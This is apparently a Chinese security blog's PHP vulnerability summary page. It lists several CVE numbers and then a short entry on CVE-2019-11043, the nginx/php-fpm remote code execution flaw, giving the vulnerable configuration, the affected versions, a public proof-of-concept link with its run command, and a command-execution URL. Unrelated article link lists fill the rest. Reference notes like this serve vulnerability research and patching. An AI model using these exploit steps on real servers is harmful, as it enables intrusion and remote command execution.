CVE-2016-7411
CVE-2016-7412
CVE-2016-7413
CVE-2016-7414
CVE-2016-7415
CVE-2016-7416
CVE-2016-7417
CVE-2016-7418


CVE-2019-11043




Date:

2019.9.

类型:

远程代码执行

前置条件:


Nginx + fastcgi + php-fpm 


配置文件信息如下:

location ~ [^/]\.php(/|$) {

  ...

  fastcgi_split_path_info ^(.+?\.php)(/.*)$;

  fastcgi_param PATH_INFO       $fastcgi_path_info;

  fastcgi_pass   php:;

  ...

}

影响范围:
version>php 7, php5(EXP暂无)
PHP 7.1版本小于7.1.33;PHP 7.2版本小于7.2.24;PHP 7.3版本小于7.3.11

PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"


ExP:
http://ip:8080/index.php?a=id


												


											
应用安全 - 编程语言漏洞 - PHP语言漏洞汇总的更多相关文章
	

    
								
  1. PhpStudy2018后门漏洞预警及漏洞复现&检测和执行POC脚本
		
    PhpStudy2018后门漏洞预警及漏洞复现&检测和执行POC脚本 phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache.PHP.MyS ...
    
		
    2. 
						
  2. DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞
		
    DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞 1.漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量 ...
    
		
    3. 
						
  3. Go语言语法汇总(转)
		
    Go语言语法汇总 分类: 技术2013-09-16 14:21 3007人阅读 评论(0) 收藏 举报 go语言golang并发语法   目录(?)[+]   最近看了看GoLang,把Go语言的语法 ...
    
		
    4. 
						
  4. Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。
		
    Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说... root@xi4ojin:~# cd ...
    
		
    5. 
						
  5. 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
		
    ==Ph4nt0m Security Team==                        Issue 0x03, Phile #0x05 of 0x07 |=----------------- ...
    
		
    6. 
						
  6. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解
		
    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read  ...
    
		
    7. 
						
  7. MySQL 0Day漏洞出现 该漏洞可以拿到本地Root权限
		
    2016年9月12日, legalhackers.com网站发布了编号为CVE-2016-6662的0day漏洞公告 .由于该漏洞可以获得MySQL服务器的Root权限,且影响MySql5.5.5.6 ...
    
		
    8. 
						
  8. ref:PHP反序列化漏洞成因及漏洞挖掘技巧与案例
		
    ref:https://www.anquanke.com/post/id/84922 PHP反序列化漏洞成因及漏洞挖掘技巧与案例 一.序列化和反序列化 序列化和反序列化的目的是使得程序间传输对象会更加 ...
    
		
    9. 
						
  9. atitit.面向过程的编程语言异常处理 c语言 asp vbs 的try catch 实现
		
    atitit.面向过程的编程语言异常处理 c语言 asp vbs 的try catch 实现 1. 返回值法.and全局ERROR 变量法 1 2. 抛出异常Err.Raise 1 3. 实现try  ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 设计模式-Interpreter(行为模式)  使用解释器给用户提供一个一门定义语言的语法表示的解释器,通过该解释器解释语言中的句子。
			
    //以下代码来源: 设计模式精解-GoF 23种设计模式解析附C++实现源码 //Context.h #pragma once class Context { public: Context(); ~ ...
    
			
    2. 
						
  2. javaScript中的 this
			
    普通函数中的 this // es3中 function foo() { console.log(this);// 这里的this是 window } foo(); // 在es5中 严格模式下 fu ...
    
			
    3. 
						
  3. Python Number(数字) Ⅱ
			
    Python math 模块.cmath 模块 Python 中数学运算常用的函数基本都在 math 模块.cmath 模块中. Python math 模块提供了许多对浮点数的数学运算函数. Pyt ...
    
			
    4. 
						
  4. mssql因为手贱修改了服务配置的最大内存,造成无法启动
			
    mssql数据库设置内存太小,造成无法启动服务. 解决办法: 1.用命令行形式启动最精简版的mssql服务,另外再用一个新的命令行去修改配置,将内存设置为无限制.  命令行要记得用管理员身份运行比较稳 ...
    
			
    5. 
						
  5. 浏览器主页在不知情的情况下设置为duba.com和newduba.cn
			
    原来是安装了“驱动精灵”. 真是个垃圾! 不通知用户的情况下,自动给锁定主页. 真TMD恶心 离倒闭不远了,现在只能通过这种方式来获取流量.
    
			
    6. 
						
  6. 使用node.js搭建本地服务器
			
    第一步安装node:https://nodejs.org/zh-cn/download/ 接下来就需要安装http的镜像文件 打开cmd:输入以下命令 npm install http-server  ...
    
			
    7. 
						
  7. hdu5988(费用流,对数相乘做加法)
			
    题意:一个网络流的图,有n个点,从1~n,然后m条边,每个点有两个值,一个是人的数量si一个是饭的数量bi.每条m边有容量ci,还有走上去可能踩断电线的概率pi(第一次踩上去没有事,之后都要p概率). ...
    
			
    8. 
						
  8. taihong
			
    揭秘!除了台风 我们还能在卫星云图上看到什么? 2019-08-08 09:20:53 来源: 中国天气网   中国天气网讯 说到卫星云图,可能大多数人首先能想到的就是台风.其实,拥有太空视角的卫星能 ...
    
			
    9. 
						
  9. virt-manager 使用 shh 远程访问配置方法
			
    1.下载安装 Xming+Xshell  或者 Xming+putty,启动Xming服务 Xming下载地址 2.XMing的配置:打开XLaunch,记住Display Number,现在这里是0 ...
    
			
    10. 
						
  10. fail-fast与fail-safe机制
			
    ----以下来自网址----- http://blog.csdn.net/ch717828/article/details/46892051 什么是 fail-fast 机制? fail-fast机制 ...
    
			
    11.